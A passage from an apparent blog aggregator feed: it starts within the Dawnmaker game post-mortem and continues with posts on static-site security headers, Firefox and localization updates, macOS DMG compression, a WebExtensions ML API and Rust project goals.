We did not find a proper answer to this question. We were constantly juggling priorities between adding systems, because we needed to prove that the game worked and was fun, and adding signs, feedback and juice, because we believed we had to show what the final product would look and feel like. We were basically building the entire game, instead of just a slice of it. This was in part because we had basically no credentials to our name, as Dawnmaker was our first real game, and feared publishers would have trouble trusting that we would be able to execute the "icing" part of the game. I still think that's a real problem, and the only solution that I see is to not try to go for funding for your first games. But I'll talk more about that in the Company strategy section below.

Screenshot of Dawnmaker, November 2023 <figcaption>Dawnmaker in November 2023</figcaption>

However, I recently came across the concept of the horizontal slice, as opposed to the vertical slice, and it blew my mind. The idea is, instead of building a small piece of your game with final quality, to build almost all of the base layers of the game. So, you would build all the systems, a good chunk of the content, everything that is required to show that the gameplay works and is fun. Without working on the game's feel, its signs and feedback, a tutorial, and so on. No icing on the cake, just the meat of it. (Meat in a cake? Yeah, that sounds weird. Or British, I don't know.) The goal of the horizontal slice is to prove that the game as a whole works, that all the systems fit together in harmony, and that the game is fun.

I believe that this is a much better model for a game like Dawnmaker. A game like Mario is fun because it has great controls, pretty assets and funny situations. That's what you prove with a vertical slice. But take a game like Balatro. It is fun because it has reached a balance between all the systems, because it has enough depth to provide a nearly-endless replayability. Controls, feedback and juice are still important of course, but they are not the core of the game, and thus when building such a game, one should not focus on those aspects, but on the systems. We should have done the same with Dawnmaker, and I'll be aiming for a horizontal slice with my next strategy game for sure.

Lesson learned

Different types of games require different processes. Find the process that best serves the development of yours. If you're making some sort of systemic game, maybe building a horizontal slice is a better tool than going for the commonly used vertical slice?

Game weaknesses

Let's now talk about the game itself. Dawnmaker received really good reviews, but I still believe it is lacking in many ways. There are many problems with the gameplay: it lacks some form of adjustable difficulty, to make it a better challenge for a bigger range of players. It lacks a more rewarding and engaging meta-progression. And of course it lacks content, as we never actually did our production phase.

Weak meta-progression

As I wrote earlier, I am very happy about the core loop of Dawnmaker. However, I think we failed big with its meta-progression. We decided to make it a roguelike, meaning that there is no progression between runs. You always start a run from the same state. Many players disliked that, and I now understand why, and why roguelites have gained so much popularity.

I recently read an article by Chris Zukowski where he discusses the kind of difficulty that Steam players like. I agree with his analysis and his concept of the "Easy-Hard-Easy (but variable)" difficulty, as I think that's part of a lot of the big successes on Steam these last few years. To summarize (read the article for more details), players like to have an easy micro-loop (the core actions of the game, what you do during one turn), a hard macro-loop (the medium-term goals, in our case, getting enough Eclairium to level up before running out of Luminoil), and on top of that, a meta-progression that they have a lot of control over, and that allows them to adjust the difficulty of the challenge. An example I like a lot is Hades and its Mirror of Night: playing the game is easy, controls are great, but winning a run is very hard. However, by choosing to grind darkness and using it to unlock certain upgrades in the mirror, you get to make the challenge a lot easier. But someone else might decide to not grind darkness, or not spend it, and play with a much greater challenge. The player has a lot of control over the difficulty of the game.
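The general shape of that player-controlled difficulty loop can be sketched as follows (hypothetical names and numbers for illustration; this is the pattern, not code from either game):

```typescript
// Hypothetical sketch of a Hades-style, player-controlled difficulty
// loop: grind a meta-currency during runs, optionally spend it on
// permanent upgrades, and each upgrade eases future runs. All names
// and numbers are made up.

interface MetaUpgrade {
  name: string;
  cost: number;             // currency needed to unlock
  difficultyRelief: number; // how much easier runs get, in [0, 1]
}

class MetaProgression {
  private currency = 0;
  private unlocked: MetaUpgrade[] = [];

  earn(amount: number): void {
    this.currency += amount;
  }

  // Spending is the player's choice: skipping it keeps the game harder.
  tryUnlock(upgrade: MetaUpgrade): boolean {
    if (this.currency < upgrade.cost) return false;
    this.currency -= upgrade.cost;
    this.unlocked.push(upgrade);
    return true;
  }

  // Base difficulty of 1.0, reduced by whatever the player unlocked,
  // with a floor so runs never become trivial.
  effectiveDifficulty(): number {
    const relief = this.unlocked.reduce((sum, u) => sum + u.difficultyRelief, 0);
    return Math.max(0.2, 1 - relief);
  }
}

const meta = new MetaProgression();
meta.earn(10);
meta.tryUnlock({ name: "Sturdy Walls", cost: 6, difficultyRelief: 0.2 });
console.log(meta.effectiveDifficulty()); // 0.8
```

The key property is that difficulty is a function of choices the player makes between runs, not a slider the designer sets once, which is exactly the control Dawnmaker's players were missing.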

Screenshot of Dawnmaker's world map <figcaption>Dawnmaker's world map</figcaption>

I think this is the biggest miss of Dawnmaker in terms of gameplay. Players cannot adjust the difficulty of the game to their tastes, which has been frustrating for a lot of them. Some complained it was way too hard while others have found the game too easy and would have enjoyed more challenge. All of them would have enjoyed the game a lot more had they had a way to control the challenge one way or another. Our mistake was to have some progression inside a run, but not outside. A player can grow stronger during a run, improving their decks or starting resources, but when they lose a run they have to start from scratch again. A player who struggles with the challenge has no way to smooth the difficulty, they have to work and learn how to play better. The "git gud" philosophy might work in some genres, but evidently it didn't fit with the audience of Dawnmaker.

This is not something that would have been easy to add though. I think it's something that needs to be thought about quite early in the process, as it impacts the core gameplay a lot. We tried to add meta-progression to our game too late in the process, and that's a reason we failed: it was too difficult to add good progression without impacting the careful balance of the core gameplay, and having to profoundly rework it.

Lesson learned

Offering an adaptive challenge is important for Steam players, and meta-progression is a good tool to do that. But it needs to be anticipated relatively early, as it is tightly tied to your core gameplay.

Lack of a strong fantasy

I believe the biggest cause of Dawnmaker's financial failure is that it lacks a strong fantasy. That gave us a lot of trouble, mostly in trying to sell the game to players. Presenting it as "city building meets deckbuilding" is not a fantasy; those are genres. We tried to put forth the "combo" gameplay, saying that cards and buildings combine to create powerful effects, but as I just wrote, that's gameplay and not a fantasy. Our fantasy was to "bring life back to a dead world", but that's not nearly strong enough: it's not surprising nor exciting.

Screenshot of Dawnmaker, February 2024 <figcaption>Dawnmaker in February 2024</figcaption>

In hindsight, I believe we missed a huge opportunity in making the zeppelin our main fantasy. It's something that's not often seen in games, it's a great figure for the ambiance of the game, and I think it would have helped create a better meta-progression. We have an "Airship" view in the game, where players can improve their starting state for the next region they're going to explore, but it's a very basic UI. There was potential to make something more exciting there.

The reason for this failure is that we started this project with mechanics and not with the fantasy. We spent a long time figuring out what our core gameplay would be, testing it until it was fun. And only then did we ask ourselves what the fantasy should be. It turns out that putting a fantasy and a theme on top of gameplay is not easy. I don't mean to say it's impossible, some have successfully done it, but I believe it is much harder than starting with an exciting fantasy and building gameplay on top of it.

Lesson learned

Marketing starts on day 1 of a game's creation. The two key elements that sell your game are its genre(s) and its fantasy or hook. Do not neglect them if you want to make money with your game.

This mistake was in part caused by me being focused primarily on mechanics as a game designer. I often start a project with a gameplay idea, a gimmick or a genre, but rarely with a theme, emotion or fantasy. It's not a problem to start with mechanics, of course. But the fantasy is what sells the game. My goal for my next games, as a designer, is to work on finding a strong fantasy that fits my mechanics much earlier in the process, and build on it instead of trying to shove it into an advanced core loop.

Company strategy

Oooo boy did we make mistakes on a company level. By that I mean, with managing our money. We messed up pretty bad — though seeing the stories that pop up regularly on some gamedev subreddits, it could have been way worse. That doesn't mean there aren't lessons to be learned here, so let's dive in!

Hiring too soon, too quickly

Managing money is difficult! Or at least, we've not been very good at it. We made the mistake of spending money at the wrong time, or on the wrong things, several times. That mainly happened because we had too much trust in the future, in the idea that we would find money easily, either by selling our game or by getting public money or investors. We did get some public funding, but it was not nearly enough to cover what we spent, so Dawnmaker was mostly paid for out of our personal savings.

The biggest misallocation of money we made was in hiring. We made two different mistakes here: on one occasion, we hired someone without properly testing that person and making sure they would fit our team and project. On the other, we hired someone only to realize, when they started, that we did not have work to give them, because we were way too early in the game's development. Both recruitments ended up costing us a significant amount of money while bringing very little value to the game or the company.

But those failed recruitments had another bad consequence: we hurt people in the process. Our inexperience has been a source of pain for human beings who chose to trust us. That is a terrible feeling for me. I don't know what more to write about this, other than I think I've learned and I hope I won't be hurting others in the future. I'll do my best anyway.

Lesson learned

Hiring is freaking hard. Do not rush it. It's better to not hire than to hire the wrong person.

Too much investment into our first game

I've talked about it already in previous sections, but the biggest strategic mistake on Dawnmaker was to spend so much time on it. Making games is hard, making games that sell is even harder, and there's an incredible amount of luck involved. Of course, the better your game, the higher your chances. But making good games requires experience. Investing 2.5 years into our first commercial game was way too risky: the more time we spent on the game, the more money it needed to make back, and I don't believe a game's revenue scales with the time invested in it.

Side note: we made a game before Dawnmaker, called Phytomancer — it's available on itch.io for 3€ — but because it had no commercial ambition, I don't think it taught us much about the key aspects of making games that sell.

Here are the facts:


  • Dawnmaker cost us about 320k€ to make — read my in-depth article about Dawnmaker's real cost for more details — and only made us about 8k€ in net revenue. That is a financial catastrophe, only possible because we invested a lot of our time and personal savings, and we benefited from some French social welfare.
  • Most indie studios close after they release their first game. It's unclear what the exact causes are, but from personal experience, I bet it's in big part because those companies invest too much in their first game and have nothing left when it comes to making the second one — either money or energy. We tend to burn cash and ourselves out.
  • And there's an economic context too: investments in games and game companies have slowed down to a trickle the past couple years, and they don't seem to be going back up soon. Games are very expensive to make, and the actors that used to pay for their production (publishers, investors) are not playing that role anymore.

Considering this, I strongly believe that today, investing several years into making your first game is not a valid company strategy. It's engaging in an act of faith. And a business should not run on faith. What pains me is that we knew this when we started Arpentor Studio, and we wanted to make Dawnmaker in about a year. But we lacked the discipline to actually keep that deadline, and we lost ourselves in the process. We got heavily side-tracked by thinking we could get some funding, by growing our scope to ask for more money, etc. We didn't start the project with a clear objective, with a strict deadline. So we kept delaying and delaying. We had the comfort of having decent money reserves. We never thought about what would happen after releasing Dawnmaker, never asked ourselves what our situation would be if the game took 3 years to release and didn't make any money. We should have.

Lesson learned

Start by making small games! Learn, experiment, grow, then go for bigger games when you're in a better position to succeed.

Here are my arguments for making several small games instead of investing too much into a single bigger game. Note that these are targeted to folks trying to create a games studio, to make a business of selling games. If your goal is to create your dream game, or if you're in it for the art but don't care about the money, this likely does not apply to you.

  • By releasing more games, you gain a lot of key experience in the business of making games that sell. You receive more player feedback. You have the opportunity to try more things. You learn the tricks of the platform(s) you're selling on — Steam is hard!
  • By releasing more games, you give yourself more chances to break out, to hit that magic moment when a game finds its audience, because it arrives at the right moment, in the right place. (For more on this, I highly recommend this article by Ryan Rigney: Nobody Knows If Your Game Will Pop Off, where the author talks about ways of predicting a hit and the correlation between the number of hits and the number of works produced.)
  • By releasing more games, you build yourself a back catalog. Games sell more on their first day, week or month, for sure, but that doesn't mean they stop selling afterwards. Games on Steam keep generating revenue for a long time, even if a small one. And a small revenue is infinitely better than no revenue at all. And small revenues can pile up to make, who knows, a decent revenue?
  • By releasing more games, you grow your audience. Each game is a way to reach new people and bring them to your following — be it through a newsletter, a discord server or your social networks. The bigger your audience, the higher your chances of selling your next game.
  • By releasing more games, you build your credibility as a game developer. When you go to an investor to show them your incredible new idea, you will make a much better impression if you have already released 5 games on Steam. You prove to them that you know how to finish a game.

Keep in mind that making small games is really, really hard. It requires a lot of discipline and planning. This is where we failed: we wanted to make our game in one year, but never planned that time. We never wrote down what our deadline was, never budgeted that year into milestones. If you want to succeed there, you need to accept that your game will not be perfect, or even good. That's fine. The goal is not to make a great game, it's to release a game. However imperfect that game is, the success criterion is not its quality, or even its sales numbers. The number one success criterion is that people can buy it.

<figcaption>Dawnmaker's cinematic release trailer</figcaption>

Conclusion

I wanted to end here, because I think this is the most important thing to learn from this post-mortem. If you're trying to build a sustainable game studio, if you're in it for the long run, then please, please start by making small games. Don't gamble on a crazy-big first game. Garner experience. Learn how the market works. Try things in a way that will cost you as little as possible. Build your audience and your credibility. Then, when the time is right, you'll be much better equipped to take on bigger projects. That doesn't mean you will automatically succeed, but your chances will be much, much higher.

As for myself? Well, I'm trying to learn from my own mistakes. My next project will be a much shorter one, with strict deadlines and milestones. I will capitalize on what I made for Dawnmaker, reusing as many tools and as much wisdom as possible, and try to make the best possible game with the time, money and resources I have. All I can say for now is that it's going to be a deckbuilding strategy game about an alchemist trying to create the Philosopher's Stone. I will talk about it more on my blog and on Arpentor's newsletter, so I hope you'll follow me into that next adventure!

Subscribe to Arpentor Studio's Newsletter! One email about every other month, no spam, with insights on the development of our games and access to early versions of future projects.

Thanks a lot to Elli for their proofreading of this very long post!

Don Martisecurity headers for a static site

This site now has an OPML version (XML) of the blogroll. What can I do with it? It seems like the old Share your OPML site is no more. Any ideas?

Also went through Securing your static website with HTTP response headers by Matt Hobbs and got a clean bill of health from the Security Headers site. Here’s what I have on here as of today:

Access-Control-Allow-Origin "https://blog.zgp.org/"
Cache-Control "max-age=3600"
Content-Security-Policy "base-uri 'self'; default-src 'self'; frame-ancestors 'self';"
Cross-Origin-Opener-Policy "same-origin"
Permissions-Policy "accelerometer=(),autoplay=(),browsing-topics=(),camera=(),display-capture=(),document-domain=(),encrypted-media=(),fullscreen=(),geolocation=(),gyroscope=(),magnetometer=(),microphone=(),midi=(),payment=(),picture-in-picture=(),publickey-credentials-get=(),screen-wake-lock=(),sync-xhr=(self),usb=(),web-share=(),xr-spatial-tracking=()" "expr=%{CONTENT_TYPE} =~ m#text\/(html|javascript)|application\/pdf|xml#i"
Referrer-Policy no-referrer-when-downgrade
Cross-Origin-Resource-Policy same-origin
Cross-Origin-Embedder-Policy require-corp
Strict-Transport-Security "max-age=2592000"
X-Content-Type-Options: nosniff

(update 2 Feb 2025) This site has some pages with inline styles, so I can’t use that CSP line right now.

To allow inline styles:

Content-Security-Policy "base-uri 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; frame-ancestors 'self';" 

The inline styles come from the SingleFile extension, which I use to make mirrored copies of pages. I need to move those mirrored copies into their own virtual host so I can go back to using the version without 'unsafe-inline'.
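The same headers aren't Apache-specific. As a quick local-testing sketch (not a production setup), they can be bolted onto Python's built-in static file server; the CSP value below is the inline-styles variant from above, and the port/host choices are arbitrary:

```python
import threading
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer

# A subset of the headers above (using the CSP variant that allows inline styles).
SECURITY_HEADERS = {
    "Content-Security-Policy": (
        "base-uri 'self'; default-src 'self'; "
        "style-src 'self' 'unsafe-inline'; frame-ancestors 'self';"
    ),
    "Referrer-Policy": "no-referrer-when-downgrade",
    "X-Content-Type-Options": "nosniff",
}

class SecureHandler(SimpleHTTPRequestHandler):
    """Static file handler that attaches the security headers to every response."""

    def end_headers(self):
        for name, value in SECURITY_HEADERS.items():
            self.send_header(name, value)
        super().end_headers()

# Serve the current directory on an ephemeral port, in the background.
server = ThreadingHTTPServer(("127.0.0.1", 0), SecureHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()
print("serving on port", server.server_address[1])
```

Hitting the printed port with `curl -I` should show the extra headers on every response, which makes it easy to iterate on a CSP before touching the real server config.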

I saved a copy of Back to the Building Blocks: A Path Toward Secure and Measurable Software (PDF). The original seems to have been taken down, but it’s a US Government document so I can keep a copy on here (like the FBI alert that got taken down last year, which I also have a copy of.)

Bonus links

Why is Big Tech hellbent on making AI opt-out? by Richard Speed. Rather than asking "we're going to shovel a load of AI services into your apps that you never asked for, but our investors really need you to use, is this OK?", the assumption instead is that users will be delighted to see their formerly pristine applications cluttered with AI features. Customers, however, seem largely dissatisfied. (IMHO if the EU is really going to throw down and do a software trade war with the USA, this is the best time to switch to European Alternatives.
Big-time proprietary software is breaking compatibility while independent alternatives keep on going. People lined up for Microsoft Windows 95 in 1995 and Apple iPhones in 2007, and a trade war with the USA would have been a problem for software users then, but now the EuroStack is a thing. The China stack, too, as Prof. Yu Zhou points out: China tech shrugged off Trump’s ‘trade war’ − there’s no reason it won’t do the same with new tariffs. I updated generative ai antimoats with some recent links. Even if the AI boom does catch on among users, services that use AI are more likely to use predictable independently-hosted models than to rely on Big Tech APIs that can be EOLed or nerfed at any time, or just have the price increased.)

California vs Texas Minimum Wage, 2013-2024 by Barry Ritholtz. [F]or seven years–from January 2013 to March 2020–[California and Texas quick-service restaurant] employment moved almost identically, the correlation between them 0.994. During that seven year period, however, TX had a flat $7.25/hr minimum wage while CA increased its minimum wage by 50%, from $8/hr to $12. Related: Is a Big Mac in Denmark Pricier Than in US?

What’s happening on RedNote? A media scholar explains the app TikTok users are fleeing to – and the cultural moment unfolding there Jianqing Chen covers the Xiaohongshu boom in the USA. This spontaneous convergence recalls the internet’s original dream of a global village. It’s a glimmer of hope for connection and communication in a divided world. (This is such authentic organic social that the Xiaohongshu ToS hasn’t even been translated into English yet. And not only does nobody read privacy policies (we knew that) but videos about reuniting with your Chinese spy from TikTok are a whole trend on there. One marketing company put up a page of Rules & Community Guidelines translated into English but I haven’t cross-checked it. Practice the core socialist values. and Promote scientific thinking and popularize scientific knowledge.)

Bob Sullivan reports Facebook acknowledges it’s in a global fight to stop scams, and might not be winning (The bigger global fight they’re in is a labor/management one, and when moderator jobs get less remunerative or more stressful, the users get stuck dealing with more crime.) Related: Meta AI case lawyer quits after Mark Zuckerberg’s ‘Neo-Nazi madness’; Llama depositions unsealed by Amy Castor and David Gerard. (The direct mail/database/surveillance marketing business, get-rich-quick schemes, and various right-wing political movements have been one big overlapping scene in the USA for quite a while, at least back to the Direct Mail and the Rise of the New Right days and possibly further. People in the USA get targeted for a lot of political disinformation and fraud (one scheme can be both), so the Xiaohongshu mod team will be in for a shock as scammers, trolls, and worse will follow the US users onto their platform.)

Firefox NightlyNew Year New Tab – These Weeks in Firefox: Issue 175

Highlights

  • Firefox 134 went out earlier this month!
  • A refreshed New Tab layout is being rolled out to users in the US and Canada, featuring a repositioned logo and weather widget to prioritize Web Search, Shortcuts, and Recommended Stories at the top. The update includes changes to the card UI for recommended stories and allows users with larger screens to see up to four columns, making better use of space.
    • The Firefox New Tab page is shown with the browser logo in the top-left, the weather indicator in the top-right, and 4 columns of stories rather than 3.

      Making better use of the space on the New Tab page!

  • dao enabled the ability to search for closed and saved tab groups (Bug 1936831)
  • kcochrane landed a keyboard shortcut for expanding and collapsing the new sidebar
    • Collapse/Expand sidebar (Ctrl + Alt + Z) – for Linux/Win
    • Collapse/Expand sidebar (⌃Z) – for macOS

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug

  •  Karan Yadav

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • Fixed about:addons blocklist state message-bars not refreshed when the add-on active state doesn’t change along with the blocklist state (Bug 1936407)
  • Fixed a moz-toggle button related visual regression in about:addons (regression introduced from Bug 1917305 in Nightly 135 and fixed in the same release by Bug 1937627)
  • Adjusted popup notification primary button default string to match the Acorn style guide (Bug 1935726)
WebExtensions Framework
  • Fixed an add-on debugging toolbox regression on resending add-ons network requests from the DevTools Network panel (regression introduced in Nightly 134 from Bug 1754452 and fixed in Nightly 135 by Bug 1934478)
    • Thanks to Alexandre Poirot for fixing this add-on debugging regression
WebExtension APIs
  • Fixed notification API event listeners not restarting suspended extension event pages (Bug 1932263)
  • As part of the work for the MV3 userScripts API (currently locked behind a pref in Nightly 134 and 135):
    • Introduced permission warning in the Firefox Desktop about:addons extensions permissions view (Bug 1931545)
    • Introduced userScripts optional permissions request dialog on Firefox Desktop (Bug 1931548)
    • NOTE: An MV3 userScripts example extension for the MDN webextensions-examples repo is being worked on in the following GitHub pull request: https://github.com/mdn/webextensions-examples/pull/576
    • The permission warning in the Firefox Desktop about:addons extensions permissions view, showing: "Unverified scripts can pose security and privacy risks, such as running harmful code or tracking website activity. Only run scripts from extensions or sources you trust." The WebExtension permission request dialog shown when installing or updating an extension, with the warning: "Unverified scripts can pose security and privacy risks. Only run scripts from extensions or sources you trust."

DevTools

DevTools Toolbox
WebDriver BiDi
  • External:
    • Liam (:ldebeasi) added support for the format argument to the browsingContext.captureScreenshot command. Clients can use it to specify an image format with a type such as “image/jpg” and a quality ranging between 0 and 1 (#1861737)
    • Spencer (:speneth) created a helper to check if a browsing context is a top-level browsing context (#1927829)
  • Internal:
    • Sasha landed several fixes to allow saving minidump files easily with geckodriver for both Firefox on desktop and mobile, which will allow debugging crashes more efficiently (#1882338, #1859377, #1937790)
    • Henrik enabled the remote.events.async.enabled preference, which means we now process and dispatch action sequences in the parent process (#1922077)
    • Henrik fixed a bug with our AnimationFramePromise which could cause actions to hang if a navigation was triggered (#1937118)

Information Management

  • We’re delaying letting the new sidebar (sidebar.revamp pref) ride the trains while we address findings from user diary studies, experiments and other feedback. Stay tuned!
  • Reworked the vertical tabs mute button in Bug 1921060 – Implement the full mute button spec
  • We’re focusing on fixing papercuts for the new sidebar and vertical tabs.

Migration Improvements

  • We’ve concluded the experiment that encouraged users to create or sign-in to Mozilla accounts to sync from the AppMenu and FxA toolbar menu. We’re currently analyzing the results.
  • Before the end of 2024, we were able to get some patches into 135 that will let us try some icon variations for the signed-out state for the FxA toolbar menu button. We’ll hopefully be testing those when 135 goes out to release!

Performance Tools (aka Firefox Profiler)

  • We added a new way to filter the profile to include only the data related to the tab you would like to see, by adding a tab selector. You can find it by clicking the "Full Profile" button in the top left corner. This allows web and Gecko developers to focus on a specific website.
    • A dropdown selector is shown above the tracks in the Firefox Profiler UI. The dropdown lists "All tabs and windows" and then "browser", followed by a list of individual domains. like "www.mozilla.org" and "www.google.com".
  • We implemented a new way to control the profiler using POSIX signals on macOS and Linux. You can send SIGUSR1 to the Firefox main process to start the profiler and SIGUSR2 to stop and dump the profile to disk. We hope that this feature will be useful for cases where Firefox is completely frozen and using the usual profiler buttons is not an option. See our documentation here.
  • Lots of performance work to make the profiler itself faster.

Search and Navigation

Scotch Bonnet

  • Mandy enhanced restricted search keywords so that users can use both their own localized language and the English shortcut Bug 1933003
  • Daisuke fixed an issue where pressing ctrl+shift+tab while the Unified Search Button was enabled and the address bar is focused would not go to the previous tab Bug 1931915
  • Daisuke also fixed an issue where focusing the urlbar with a click and pressing shift tab wouldn’t focus the Unified Search Button Bug 1933251
  • Daisuke enabled the keyboard focus of the Unified Search Button using Shift + Tab after focus using CTRL + L Bug 1937363
  • Daisuke changed the behavior of the Unified Search Button to show when editing a URL instead of initial focus Bug 1936090
  • Lots of other papercuts fixed by the team

Search

  • Mandy initiated the removal of old application-provided search engine WebExtensions from users' profiles, as they are no longer required now that search-config-v2 is in use Bug 1885953

Suggest

  • Drew implemented a new simplified UI treatment for Weather Suggestions Bug 1938517
  • Drew removed the Suggest JS Backend as the Rust based backend was enabled by default in 124 Bug 1932502

Storybook/Reusable Components

  • Anna Kulyk added new --table-row-background-color and --table-row-background-color-alternate design tokens Bug 1919313
  • Anna Kulyk added support for the panel-item disabled attribute Bug 1919122

Mozilla Localization (L10N)L10n report: January 2025 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

Welcome!

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New content and projects

What’s new or coming up in Firefox desktop

Tab Groups

Tab groups are now available in Nightly 136! To create a group in Nightly, all you have to do is have two tabs open, click and drag one tab to the other, pause a sec and then drop. From there the tab group editor window will appear where you can name the group and give it a color. After saving, the group will appear on your tab bar.

Once you create a group, you can easily access your groups from the overflow menu on the right.

 

These work great in the sidebar and vertical tabs feature that was released in the Firefox Labs feature in Nightly 131!

New profile selector

The new profile selector which we have been localizing over the previous months is now starting to roll out gradually to users in Nightly 136. SUMO has an excellent article about all the new changes which you can find here.

What’s new or coming up in web projects

AMO and AMO Frontend

The team is planning to migrate/copy the Spanish (es) locale into four: es-AR, es-CL, es-ES, and es-MX. Per the community managers’ input, all locales will retain the suggestions that have not been approved at the time of migration. Be on the lookout for the changes in the upcoming week(s).

Mozilla Accounts

The Mozilla accounts team recently landed strings used in three emails planned to be sent over the course of 90 days, with the first happening in the coming weeks. These will be sent to inactive users who have not logged in or interacted with the Mozilla accounts service in 2 years, letting them know their account and data may be deleted.

What’s new or coming up in SUMO

The CX team is still working on 2025 planning. In the meantime, read a recap from our technical writer, Lucas Siebert about how 2024 went in this blog post. We will also have a community call coming up on Feb 5th at 5 PM UTC. Check out the agenda for more detail and we’d love to see you there!

Last but not least, we will be at FOSDEM 2025. Mozilla’s booth will be at the K building, level 1. Would love to see you if you’re around!

What’s new or coming up in Pontoon

New Email Features

We’re excited to announce two new email features that will keep you better informed and connected with your localization work on Pontoon:

Email Notifications: Opt in to receive notifications via email, ensuring you stay up to date with important events even when you’re away from the platform. You can choose between daily or weekly digests and subscribe to specific notification types only.

Monthly Activity Summary: If enabled, you’ll receive an email summary at the start of each month, highlighting your personal activity and key activities within your teams for the previous month.

Visit your settings to explore and activate these features today!

New Translation Memory tools are here!

If you are a locale manager or translator, here’s what you can do from the new TM tab on your team page:

  • Search, edit, and delete Translation Memory entries with ease.
  • Upload .TMX files to instantly share your Translation Memories with your team.

These tools are here to save you time and boost the quality of suggestions from Machinery. Dive in and explore the new features today!

Moving to GitHub Discussions

Feedback, support and conversations on new Pontoon developments have moved from Discourse to GitHub Discussions. See you there!

Newly published localizer facing documentation

Events

Come check out our end of year presentation on Pontoon! A Youtube link and AirMozilla link are available.

Want to showcase an event coming up that your community is participating in? Contact us and we’ll include it.

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact us and we’ll make sure they get a shout-out!

Useful Links

Questions? Want to get involved?

If you want to get involved, or have any question about l10n, reach out to:

Did you enjoy reading this report? Let us know how we can improve it.

Firefox NightlyFirefox on macOS: now smaller and quicker to install!

Firefox is typically installed on macOS by downloading a DMG (Disk iMaGe) file, and dragging the Firefox.app into /Applications. These DMG files are compressed to reduce download time. As of Firefox 136, we’re making an under-the-hood change to them, switching from bzip2 to lzma compression, which shrinks their size by ~9% and cuts decompression time by ~50%.

Why now?

If you’re familiar with macOS packaging, you’ll know that LZMA support was introduced in macOS 10.15, all the way back in 2019. However, Firefox continued to support older versions of macOS until Firefox 116.0 was released in August 2023, which meant that we couldn’t use it before then.

But that still raises the question: why wait another ~18 months to realize these improvements? Answering that question requires a bit of explanation of how we package Firefox…

Packaging Firefox for macOS… on Linux!

Most DMGs are created with hdiutil, a standard tool that ships with macOS. hdiutil is a fine tool, but unfortunately, it only runs natively on macOS. This is a problem for us, because we package Firefox thousands of times per day, and it is impractical to maintain a fleet of macOS machines large enough to support this. Instead, we use libdmg-hfsplus, a 3rd party tool that runs on Linux, to create our DMGs. This allows us to scale these operations as much as needed for a fraction of the cost.

Why now, redux

Until recently, our fork of libdmg-hfsplus only supported bzip2 compression, which of course made it impossible for us to use lzma. Thanks to some recent efforts by Dave Vasilevsky, a wonderful volunteer who previously added bzip2 support, it now supports lzma compression.

We quietly enabled this for Firefox Nightly in 135.0, and now that it’s had some bake time there, we’re confident that it’s ready to be shipped on Beta and Release.

Why LZMA?

DMGs support many types of compression: bzip2, zlib, lzfse and lzma being the most notable. Each of these has strengths and weaknesses:

  • bzip2 has the best compression (in terms of size) that is supported on all macOS versions, but the slowest decompression
  • zlib has very fast decompression, at the cost of increased package size
  • lzfse has the fastest decompression, but the second largest package size
  • lzma has the second fastest decompression and the best compression in terms of size, at the cost of increased compression times

With all of this in mind, we chose lzma to make improvements on both download size and installation time.
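The size trade-off is easy to poke at with the standard-library bindings for both codecs. This is a toy benchmark only — the sample data and compression levels are arbitrary, and real app-bundle contents will compress differently (the post's ~9% figure is the realistic one):

```python
import bz2
import lzma

# Mildly repetitive sample data, standing in for a 1 MiB app bundle.
data = b"Mozilla Firefox " * 65536

bz = bz2.compress(data, 9)          # bzip2, maximum compression level
xz = lzma.compress(data, preset=9)  # lzma (xz container), maximum preset

# Both codecs must round-trip losslessly.
assert bz2.decompress(bz) == data
assert lzma.decompress(xz) == data

print("bzip2:", len(bz), "bytes")
print("lzma: ", len(xz), "bytes")
```

Timing `bz2.decompress` against `lzma.decompress` on larger inputs is the more interesting comparison for install time, since decompression happens on the user's machine.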

You may wonder why download size is an important consideration, seeing as fast broadband connections are common these days. This may be true in many places, but not everyone has the benefits of a fast unmetered connection. Reducing download size has an outsized impact for users with slow connections, or those who pay for each gigabyte used.

What does this mean for you?

Absolutely nothing! Other than a quicker installation, you should see absolutely no changes to the Firefox installation experience.

Of course, edge cases exist and bugs are possible. If you do notice something that you think may be related to this change please file a bug or post on discourse to bring it to our attention.

Get involved!

If you’d like to be like Dave, and contribute to Firefox development, take a look at codetribute.mozilla.org. Whether you’re interested in automation and tools, the Firefox frontend, the JavaScript engine, or many other things, there’s an opportunity waiting just for you!

Mozilla Addons BlogAnnouncing the WebExtensions ML API

Greetings extension developers!

We wanted to highlight this just-published blog post from our AI team where they share some exciting news – we’re shipping a new experimental ML API in Firefox that will allow developers to leverage our AI Runtime to run offline machine learning tasks in their web extensions.

Head on over to Mozilla’s AI blog to learn more. After you’ve had a chance to check it out, we encourage you to share feedback, comments, or questions over on the Mozilla AI Discord (invite link).

Happy coding!

The post Announcing the WebExtensions ML API appeared first on Mozilla Add-ons Community Blog.

The Rust Programming Language BlogDecember Project Goals Update

Over the last six months, the Rust project has been working towards a slate of 26 project goals, with 3 of them designated as Flagship Goals. This post provides a final update on our progress towards these goals (or, in some cases, lack thereof). We are currently finalizing plans for the next round of project goals, which will cover 2025H1. The full details for any particular goal are available in its associated tracking issue on the rust-project-goals repository.

Flagship goals

Our big goal for this period was async closures, and we are excited to announce that work there is done! Stable support for async closures landed on nightly on Dec 12 and it will be included in Rust 1.85, which ships on Feb 20. Big kudos to compiler-errors for driving that.

For our other goals, we made progress, but there remains work to be done:

  • Return Type Notation (RTN) is implemented and we had a call for experimentation, but it has not yet reached stable. This will be done as part of our 2025H1 goal.
  • Async Functions in Traits (and Return Position Impl Trait in Trait) are currently not considered dyn compatible. We would eventually like to have first-class dyn support, but as an intermediate step we created a procedural macro crate, dynosaur, that can create wrappers that enable dynamic dispatch. We are planning a comprehensive blog post in 2025H1 that shows how to use this crate and lays out the overall plan for async functions in traits.
  • Work was done to prototype an implementation for async drop, but we didn't account for reviewing bandwidth. nikomatsakis has done initial reads and is working with the PR author to get this done in 2025H1. To be clear, though, the scope of this is an experiment with the goal of uncovering implementation hurdles. There remains significant language design work before this feature would be considered for stabilization (we don't even have an RFC, and there are lots of unknowns remaining).
